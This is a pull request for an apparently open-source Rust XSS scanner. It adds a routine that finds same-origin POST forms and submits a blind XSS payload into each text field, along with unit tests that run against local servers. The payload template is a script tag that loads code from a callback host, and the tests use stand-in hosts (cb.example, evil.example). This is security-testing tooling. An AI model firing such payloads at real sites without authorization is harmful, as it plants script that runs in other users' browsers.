### PR TITLE
scanning: inject Blind XSS payload into same-origin POST forms

### DIFF
--- a/src/cmd/scan.rs
+++ b/src/cmd/scan.rs
@@ -1679,6 +1679,7 @@ pub async fn run_scan(args: &ScanArgs) -> ScanOutcome {
         for group in host_groups.values() {
             for target in group {
                 crate::scanning::blind_scanning(target, callback_url).await;
+                crate::scanning::blind_scan_forms(target, callback_url).await;
             }
         }
     }

--- a/src/scanning/mod.rs
+++ b/src/scanning/mod.rs
@@ -1201,7 +1201,7 @@ fn collapse_redundant_reflected(
         .collect()
 }
 
-pub use xss_blind::blind_scanning;
+pub use xss_blind::{blind_scan_forms, blind_scanning};
 
 #[cfg(test)]
 mod tests;

--- a/src/scanning/xss_blind.rs
+++ b/src/scanning/xss_blind.rs
@@ -157,5 +157,169 @@ async fn send_blind_request(target: &Target, param_name: &str, payload: &str, pa
     }
 }
 
+/// Discover HTML `<form>` elements on the target page and submit the Blind XSS
+/// payload to each same-origin POST form, one request per text-like field.
+///
+/// GET forms are skipped because their fields overlap with the existing
+/// query-param blind injection in [`blind_scanning`]. Cross-origin form
+/// actions are skipped to avoid unintended outbound requests. Multipart
+/// forms are also skipped in this first pass.
+pub async fn blind_scan_forms(target: &Target, callback_url: &str) {
+    use tokio::time::{Duration, sleep};
+    use url::form_urlencoded;
+
+    let template = crate::payload::XSS_BLIND_PAYLOADS
+        .first()
+        .copied()
+        .unwrap_or("\"'><script src={}></script>");
+    let payload = template.replace("{}", callback_url);
+
+    let client = target.build_client_or_default();
+
+    // Fetch the target HTML to extract forms.
+    let mut fetch = client.request(target.parse_method(), target.url.clone());
+    for (k, v) in &target.headers {
+        fetch = fetch.header(k, v);
+    }
+    if let Some(ua) = &target.user_agent {
+        fetch = fetch.header("User-Agent", ua);
+    }
+    if !target.cookies.is_empty() {
+        let cookie_header = target
+            .cookies
+            .iter()
+            .map(|(k, v)| format!("{}={}", k, v))
+            .collect::<Vec<_>>()
+            .join("; ");
+        fetch = fetch.header("Cookie", cookie_header);
+    }
+    if let Some(data) = &target.data {
+        fetch = fetch.body(data.clone());
+    }
+    crate::tick_request_count();
+    let html = match fetch.send().await {
+        Ok(resp) => match resp.text().await {
+            Ok(text) => text,
+            Err(_) => return,
+        },
+        Err(_) => return,
+    };
+
+    // Parse forms in a tight scope so `scraper::Html` (which is !Send) never
+    // escapes across an await boundary.
+    struct FormInfo {
+        action: url::Url,
+        fields: Vec<(String, String)>,
+    }
+    let forms: Vec<FormInfo> = {
+        let document = scraper::Html::parse_document(&html);
+        let form_sel = crate::scanning::selectors::form();
+        let input_sel = crate::scanning::selectors::input_textarea_select();
+
+        let mut out = Vec::new();
+        for form in document.select(form_sel) {
+            let method = form.value().attr("method").unwrap_or("get");
+            if !method.eq_ignore_ascii_case("post") {
+                continue;
+            }
+            let enctype = form.value().attr("enctype").unwrap_or("");
+            if enctype.eq_ignore_ascii_case("multipart/form-data") {
+                continue;
+            }
+
+            let action_attr = form.value().attr("action").unwrap_or("");
+            let action_url = if action_attr.is_empty() || action_attr == "#" {
+                target.url.clone()
+            } else {
+                match target.url.join(action_attr) {
+                    Ok(u) => u,
+                    Err(_) => continue,
+                }
+            };
+
+            if !is_same_origin(&target.url, &action_url) {
+                continue;
+            }
+
+            let mut fields: Vec<(String, String)> = Vec::new();
+            for input in form.select(input_sel) {
+                let name = input.value().attr("name").unwrap_or("").to_string();
+                if name.is_empty() {
+                    continue;
+                }
+                let value = input.value().attr("value").unwrap_or("").to_string();
+                fields.push((name, value));
+            }
+            if fields.is_empty() {
+                continue;
+            }
+
+            out.push(FormInfo {
+                action: action_url,
+                fields,
+            });
+        }
+        out
+    };
+
+    for FormInfo { action, fields } in forms {
+        for (field_idx, _) in fields.iter().enumerate() {
+            let body = fields
+                .iter()
+                .enumerate()
+                .map(|(i, (n, v))| {
+                    let value = if i == field_idx { &payload } else { v };
+                    let enc_n = form_urlencoded::byte_serialize(n.as_bytes()).collect::<String>();
+                    let enc_v =
+                        form_urlencoded::byte_serialize(value.as_bytes()).collect::<String>();
+                    format!("{}={}", enc_n, enc_v)
+                })
+                .collect::<Vec<_>>()
+                .join("&");
+
+            let mut request = client
+                .post(action.clone())
+                .header("Content-Type", "application/x-www-form-urlencoded");
+            for (k, v) in &target.headers {
+                request = request.header(k, v);
+            }
+            if let Some(ua) = &target.user_agent {
+                request = request.header("User-Agent", ua);
+            }
+            if !target.cookies.is_empty() {
+                let cookie_header = target
+                    .cookies
+                    .iter()
+                    .map(|(k, v)| format!("{}={}", k, v))
+                    .collect::<Vec<_>>()
+                    .join("; ");
+                request = request.header("Cookie", cookie_header);
+            }
+            request = request.body(body);
+
+            crate::tick_request_count();
+            if let Err(e) = request.send().await
+                && crate::DEBUG.load(std::sync::atomic::Ordering::Relaxed)
+            {
+                eprintln!(
+                    "[DBG] blind form request failed action={} field_idx={}: {}",
+                    action, field_idx, e
+                );
+            }
+
+            if target.delay > 0 {
+                sleep(Duration::from_millis(target.delay)).await;
+            }
+        }
+    }
+}
+
+/// Same-origin check: scheme + host + port must match.
+fn is_same_origin(a: &url::Url, b: &url::Url) -> bool {
+    a.scheme() == b.scheme()
+        && a.host_str() == b.host_str()
+        && a.port_or_known_default() == b.port_or_known_default()
+}
+
 #[cfg(test)]
 mod tests;

--- a/src/scanning/xss_blind.rs
+++ b/src/scanning/xss_blind.rs
@@ -158,7 +158,10 @@ async fn send_blind_request(target: &Target, param_name: &str, payload: &str, pa
 }
 
 /// Discover HTML `<form>` elements on the target page and submit the Blind XSS
-/// payload to each same-origin POST form, one request per text-like field.
+/// payload to each same-origin POST form, one request per injectable text-like
+/// field. Non-text inputs (hidden, file, submit, button, image, reset,
+/// checkbox, radio) and `<select>` keep their original value so CSRF tokens
+/// and similar state survive the injection.
 ///
 /// GET forms are skipped because their fields overlap with the existing
 /// query-param blind injection in [`blind_scanning`]. Cross-origin form
@@ -175,26 +178,20 @@ pub async fn blind_scan_forms(target: &Target, callback_url: &str) {
     let payload = template.replace("{}", callback_url);
 
     let client = target.build_client_or_default();
+    let cookie_header = build_cookie_header(&target.cookies);
 
-    // Fetch the target HTML to extract forms.
-    let mut fetch = client.request(target.parse_method(), target.url.clone());
+    // Always GET the form-bearing page. Reusing target.method would POST to
+    // the form handler instead of fetching the landing page that renders the
+    // form, mirroring discovery::probe_html_forms.
+    let mut fetch = client.get(target.url.clone());
     for (k, v) in &target.headers {
         fetch = fetch.header(k, v);
     }
     if let Some(ua) = &target.user_agent {
         fetch = fetch.header("User-Agent", ua);
     }
-    if !target.cookies.is_empty() {
-        let cookie_header = target
-            .cookies
-            .iter()
-            .map(|(k, v)| format!("{}={}", k, v))
-            .collect::<Vec<_>>()
-            .join("; ");
-        fetch = fetch.header("Cookie", cookie_header);
-    }
-    if let Some(data) = &target.data {
-        fetch = fetch.body(data.clone());
+    if let Some(ref h) = cookie_header {
+        fetch = fetch.header("Cookie", h);
     }
     crate::tick_request_count();
     let html = match fetch.send().await {
@@ -207,9 +204,14 @@ pub async fn blind_scan_forms(target: &Target, callback_url: &str) {
 
     // Parse forms in a tight scope so `scraper::Html` (which is !Send) never
     // escapes across an await boundary.
+    struct FormField {
+        name: String,
+        value: String,
+        injectable: bool,
+    }
     struct FormInfo {
         action: url::Url,
-        fields: Vec<(String, String)>,
+        fields: Vec<FormField>,
     }
     let forms: Vec<FormInfo> = {
         let document = scraper::Html::parse_document(&html);
@@ -241,16 +243,21 @@ pub async fn blind_scan_forms(target: &Target, callback_url: &str) {
                 continue;
             }
 
-            let mut fields: Vec<(String, String)> = Vec::new();
+            let mut fields: Vec<FormField> = Vec::new();
             for input in form.select(input_sel) {
                 let name = input.value().attr("name").unwrap_or("").to_string();
                 if name.is_empty() {
                     continue;
                 }
                 let value = input.value().attr("value").unwrap_or("").to_string();
-                fields.push((name, value));
+                let injectable = is_injectable_input(&input);
+                fields.push(FormField {
+                    name,
+                    value,
+                    injectable,
+                });
             }
-            if fields.is_empty() {
+            if !fields.iter().any(|f| f.injectable) {
                 continue;
             }
 
@@ -263,13 +270,17 @@ pub async fn blind_scan_forms(target: &Target, callback_url: &str) {
     };
 
     for FormInfo { action, fields } in forms {
-        for (field_idx, _) in fields.iter().enumerate() {
+        for field_idx in 0..fields.len() {
+            if !fields[field_idx].injectable {
+                continue;
+            }
             let body = fields
                 .iter()
                 .enumerate()
-                .map(|(i, (n, v))| {
-                    let value = if i == field_idx { &payload } else { v };
-                    let enc_n = form_urlencoded::byte_serialize(n.as_bytes()).collect::<String>();
+                .map(|(i, f)| {
+                    let value = if i == field_idx { &payload } else { &f.value };
+                    let enc_n =
+                        form_urlencoded::byte_serialize(f.name.as_bytes()).collect::<String>();
                     let enc_v =
                         form_urlencoded::byte_serialize(value.as_bytes()).collect::<String>();
                     format!("{}={}", enc_n, enc_v)
@@ -277,23 +288,22 @@ pub async fn blind_scan_forms(target: &Target, callback_url: &str) {
                 .collect::<Vec<_>>()
                 .join("&");
 
-            let mut request = client
-                .post(action.clone())
-                .header("Content-Type", "application/x-www-form-urlencoded");
+            let mut request = client.post(action.clone());
             for (k, v) in &target.headers {
+                // Skip Content-Type from caller-supplied headers so we don't
+                // emit a second value that conflicts with the urlencoded body.
+                if k.eq_ignore_ascii_case("content-type") {
+                    continue;
+                }
                 request = request.header(k, v);
             }
+            // Set Content-Type last to guarantee it wins.
+            request = request.header("Content-Type", "application/x-www-form-urlencoded");
             if let Some(ua) = &target.user_agent {
                 request = request.header("User-Agent", ua);
             }
-            if !target.cookies.is_empty() {
-                let cookie_header = target
-                    .cookies
-                    .iter()
-                    .map(|(k, v)| format!("{}={}", k, v))
-                    .collect::<Vec<_>>()
-                    .join("; ");
-                request = request.header("Cookie", cookie_header);
+            if let Some(ref h) = cookie_header {
+                request = request.header("Cookie", h);
             }
             request = request.body(body);
 
@@ -312,6 +322,44 @@ pub async fn blind_scan_forms(target: &Target, callback_url: &str) {
             }
         }
     }
+}
+
+/// Build a `Cookie:` header value once, returning None if the target has no
+/// cookies configured.
+fn build_cookie_header(cookies: &[(String, String)]) -> Option<String> {
+    if cookies.is_empty() {
+        return None;
+    }
+    Some(
+        cookies
+            .iter()
+            .map(|(k, v)| format!("{}={}", k, v))
+            .collect::<Vec<_>>()
+            .join("; "),
+    )
+}
+
+/// Returns true when an `input`/`textarea`/`select` node accepts free-form
+/// user-controlled text, so substituting the Blind XSS payload there makes
+/// sense. Non-text-bearing inputs (hidden, file, submit, button, image,
+/// reset, checkbox, radio) and `<select>` keep their original value so CSRF
+/// tokens and option choices survive.
+fn is_injectable_input(el: &scraper::element_ref::ElementRef<'_>) -> bool {
+    let tag = el.value().name();
+    if tag.eq_ignore_ascii_case("textarea") {
+        return true;
+    }
+    if !tag.eq_ignore_ascii_case("input") {
+        // `<select>` and anything else: not free-form text.
+        return false;
+    }
+    // <input> defaults to type="text" when the attribute is missing or
+    // unrecognized. Treat the well-known text-bearing types as injectable.
+    let ty = el.value().attr("type").unwrap_or("text");
+    matches!(
+        ty.to_ascii_lowercase().as_str(),
+        "text" | "search" | "url" | "email" | "tel" | "password" | "number"
+    )
 }
 
 /// Same-origin check: scheme + host + port must match.

--- a/src/scanning/xss_blind/tests.rs
+++ b/src/scanning/xss_blind/tests.rs
@@ -4,8 +4,8 @@ use axum::{
     body::{Body, to_bytes},
     extract::State,
     http::{Request, StatusCode},
-    response::IntoResponse,
-    routing::any,
+    response::{Html, IntoResponse},
+    routing::{any, get},
 };
 use std::collections::HashMap;
 use std::net::{Ipv4Addr, SocketAddr};
@@ -158,6 +158,123 @@ async fn test_send_blind_request_unknown_param_type_falls_back_to_default_path()
     let records = state.lock().await.clone();
     assert_eq!(records.len(), 1);
     assert_eq!(records[0].uri, "/");
+}
+
+async fn start_form_server(html: &'static str) -> (SocketAddr, CaptureState) {
+    let state: CaptureState = Arc::new(Mutex::new(Vec::new()));
+    let app = Router::new()
+        .route("/", get(move || async move { Html(html) }))
+        .route("/submit", any(capture_handler))
+        .route("/other", any(capture_handler))
+        .with_state(state.clone());
+
+    let listener = tokio::net::TcpListener::bind((Ipv4Addr::LOCALHOST, 0))
+        .await
+        .expect("bind listener");
+    let addr = listener.local_addr().expect("listener addr");
+
+    tokio::spawn(async move {
+        let _ = axum::serve(listener, app).await;
+    });
+
+    sleep(Duration::from_millis(30)).await;
+    (addr, state)
+}
+
+#[tokio::test]
+async fn test_blind_scan_forms_posts_payload_for_same_origin_post_form() {
+    static HTML: &str = r#"<html><body>
+        <form method="POST" action="/submit">
+            <input name="user" value="alice">
+            <input name="msg" value="hi">
+        </form>
+    </body></html>"#;
+    let (addr, state) = start_form_server(HTML).await;
+    let target = make_target(addr, "/");
+
+    blind_scan_forms(&target, "https://cb.example").await;
+
+    let records = state.lock().await.clone();
+    // Two text fields -> two POSTs, one with payload in `user`, one in `msg`.
+    assert_eq!(records.len(), 2);
+    assert!(records.iter().all(|r| r.method == "POST"));
+    assert!(records.iter().all(|r| r.uri == "/submit"));
+    assert!(records.iter().all(|r| {
+        r.headers
+            .get("content-type")
+            .map(|v| v.contains("application/x-www-form-urlencoded"))
+            .unwrap_or(false)
+    }));
+    // Each request carries the callback URL somewhere in the body.
+    assert!(records.iter().all(|r| r.body.contains("cb.example")
+        || r.body.contains("cb.example".replace(".", "%2E").as_str())));
+    // Payload should land in each field exactly once across the two requests.
+    let user_hits = records
+        .iter()
+        .filter(|r| {
+            let user_part = r.body.split('&').find(|p| p.starts_with("user="));
+            user_part.map(|p| p.contains("cb.example")).unwrap_or(false)
+        })
+        .count();
+    let msg_hits = records
+        .iter()
+        .filter(|r| {
+            let msg_part = r.body.split('&').find(|p| p.starts_with("msg="));
+            msg_part.map(|p| p.contains("cb.example")).unwrap_or(false)
+        })
+        .count();
+    assert_eq!(user_hits, 1);
+    assert_eq!(msg_hits, 1);
+}
+
+#[tokio::test]
+async fn test_blind_scan_forms_skips_get_forms() {
+    static HTML: &str = r#"<html><body>
+        <form method="GET" action="/submit">
+            <input name="q" value="seed">
+        </form>
+    </body></html>"#;
+    let (addr, state) = start_form_server(HTML).await;
+    let target = make_target(addr, "/");
+
+    blind_scan_forms(&target, "https://cb.example").await;
+
+    let records = state.lock().await.clone();
+    // No POSTs should hit /submit; the only request is the initial GET / for HTML.
+    assert!(records.iter().all(|r| r.uri != "/submit"));
+}
+
+#[tokio::test]
+async fn test_blind_scan_forms_skips_cross_origin_action() {
+    static HTML: &str = r#"<html><body>
+        <form method="POST" action="https://evil.example/x">
+            <input name="user" value="alice">
+        </form>
+    </body></html>"#;
+    let (addr, state) = start_form_server(HTML).await;
+    let target = make_target(addr, "/");
+
+    blind_scan_forms(&target, "https://cb.example").await;
+
+    let records = state.lock().await.clone();
+    // Cross-origin action should be skipped; nothing posted to /submit.
+    assert!(records.iter().all(|r| r.method != "POST"));
+}
+
+#[tokio::test]
+async fn test_blind_scan_forms_skips_multipart() {
+    static HTML: &str = r#"<html><body>
+        <form method="POST" action="/submit" enctype="multipart/form-data">
+            <input name="file" value="">
+        </form>
+    </body></html>"#;
+    let (addr, state) = start_form_server(HTML).await;
+    let target = make_target(addr, "/");
+
+    blind_scan_forms(&target, "https://cb.example").await;
+
+    let records = state.lock().await.clone();
+    assert!(records.iter().all(|r| r.method != "POST"));
 }
 
 #[tokio::test]

--- a/src/scanning/xss_blind/tests.rs
+++ b/src/scanning/xss_blind/tests.rs
@@ -206,8 +206,9 @@ async fn test_blind_scan_forms_posts_payload_for_same_origin_post_form() {
             .unwrap_or(false)
     }));
     // Each request carries the callback URL somewhere in the body.
-    assert!(records.iter().all(|r| r.body.contains("cb.example")
-        || r.body.contains("cb.example".replace(".", "%2E").as_str())));
+    // form_urlencoded::byte_serialize leaves '.' alone, so the literal host
+    // string is what we expect to see on the wire.
+    assert!(records.iter().all(|r| r.body.contains("cb.example")));
     // Payload should land in each field exactly once across the two requests.
     let user_hits = records
         .iter()
@@ -240,8 +241,9 @@ async fn test_blind_scan_forms_skips_get_forms() {
     blind_scan_forms(&target, "https://cb.example").await;
 
     let records = state.lock().await.clone();
-    // No POSTs should hit /submit; the only request is the initial GET / for HTML.
-    assert!(records.iter().all(|r| r.uri != "/submit"));
+    // The form-bearing GET / is handled by a static Html route (not captured).
+    // No requests should ever reach the capture handler for a GET form.
+    assert!(records.is_empty(), "unexpected requests: {:?}", records);
 }
 
 #[tokio::test]
@@ -259,6 +261,101 @@ async fn test_blind_scan_forms_skips_cross_origin_action() {
     let records = state.lock().await.clone();
     // Cross-origin action should be skipped; nothing posted to /submit.
     assert!(records.iter().all(|r| r.method != "POST"));
+}
+
+#[tokio::test]
+async fn test_blind_scan_forms_preserves_hidden_csrf_and_skips_hidden_rotation() {
+    static HTML: &str = r#"<html><body>
+        <form method="POST" action="/submit">
+            <input type="hidden" name="_csrf" value="tok123">
+            <input name="user" value="alice">
+        </form>
+    </body></html>"#;
+    let (addr, state) = start_form_server(HTML).await;
+    let target = make_target(addr, "/");
+
+    blind_scan_forms(&target, "https://cb.example").await;
+
+    let records = state.lock().await.clone();
+    // Exactly one POST: the `user` field rotates in, the hidden _csrf is not
+    // rotated (so it never receives the payload), but its original value is
+    // preserved in every emitted body.
+    assert_eq!(records.len(), 1);
+    let req = &records[0];
+    assert_eq!(req.method, "POST");
+    // CSRF token survives intact.
+    assert!(
+        req.body.contains("_csrf=tok123"),
+        "csrf token missing: {}",
+        req.body
+    );
+    // Payload landed in `user` and not in `_csrf`.
+    let csrf_part = req.body.split('&').find(|p| p.starts_with("_csrf="));
+    let user_part = req.body.split('&').find(|p| p.starts_with("user="));
+    assert!(
+        csrf_part
+            .map(|p| !p.contains("cb.example"))
+            .unwrap_or(false)
+    );
+    assert!(user_part.map(|p| p.contains("cb.example")).unwrap_or(false));
+}
+
+#[tokio::test]
+async fn test_blind_scan_forms_uses_get_to_fetch_even_when_target_is_post() {
+    static HTML: &str = r#"<html><body>
+        <form method="POST" action="/submit">
+            <input name="user" value="alice">
+        </form>
+    </body></html>"#;
+    let (addr, state) = start_form_server(HTML).await;
+    // Configure the target as POST with body data; the fetch step must still
+    // GET the form-bearing page rather than echoing the target's method.
+    let mut target = make_target(addr, "/");
+    target.method = "POST".to_string();
+    target.data = Some("seed=1".to_string());
+
+    blind_scan_forms(&target, "https://cb.example").await;
+
+    let records = state.lock().await.clone();
+    // The only request we capture is the form POST to /submit.
+    // (The HTML GET to "/" is served by the static Html handler.)
+    assert_eq!(records.len(), 1);
+    assert_eq!(records[0].method, "POST");
+    assert_eq!(records[0].uri, "/submit");
+}
+
+#[tokio::test]
+async fn test_blind_scan_forms_overrides_caller_content_type() {
+    static HTML: &str = r#"<html><body>
+        <form method="POST" action="/submit">
+            <input name="user" value="alice">
+        </form>
+    </body></html>"#;
+    let (addr, state) = start_form_server(HTML).await;
+    let mut target = make_target(addr, "/");
+    // Caller-supplied Content-Type would otherwise be appended alongside our
+    // urlencoded type. Verify it does NOT make it onto the form POST.
+    target.headers = vec![("Content-Type".to_string(), "application/json".to_string())];
+
+    blind_scan_forms(&target, "https://cb.example").await;
+
+    let records = state.lock().await.clone();
+    assert_eq!(records.len(), 1);
+    let ct = records[0]
+        .headers
+        .get("content-type")
+        .cloned()
+        .unwrap_or_default();
+    assert!(
+        ct.contains("application/x-www-form-urlencoded"),
+        "content-type missing urlencoded: {}",
+        ct
+    );
+    assert!(
+        !ct.contains("application/json"),
+        "caller content-type leaked: {}",
+        ct
+    );
 }
 
 #[tokio::test]


### PR DESCRIPTION
## Summary
- Adds `blind_scan_forms` in `src/scanning/xss_blind.rs` that parses `<form>` elements on the target page and submits the Blind XSS payload to each same-origin POST form, one request per text-like field.
- Skips GET forms (already covered by query-param blind injection in `blind_scanning`), cross-origin form actions (to avoid unintended outbound requests), and `multipart/form-data` forms (left for a follow-up).
- Wires the new step into the existing `--blind` callback loop in `src/cmd/scan.rs` right next to `blind_scanning`, so it runs whenever a callback URL is configured.

Closes #670.

## Test plan
- [x] `cargo build` — clean.
- [x] `cargo test --lib` — 911 passed, 0 failed.
- [x] `cargo clippy --lib --tests -- -D warnings` — clean.
- [x] `cargo fmt --check` — clean.
- [x] New unit tests in `src/scanning/xss_blind/tests.rs`:
  - same-origin POST form → one POST per text field with payload in target field
  - GET form → skipped
  - cross-origin `action` → skipped
  - `enctype=multipart/form-data` → skipped
- [ ] Manual smoke against a sample app with a contact form (reviewer).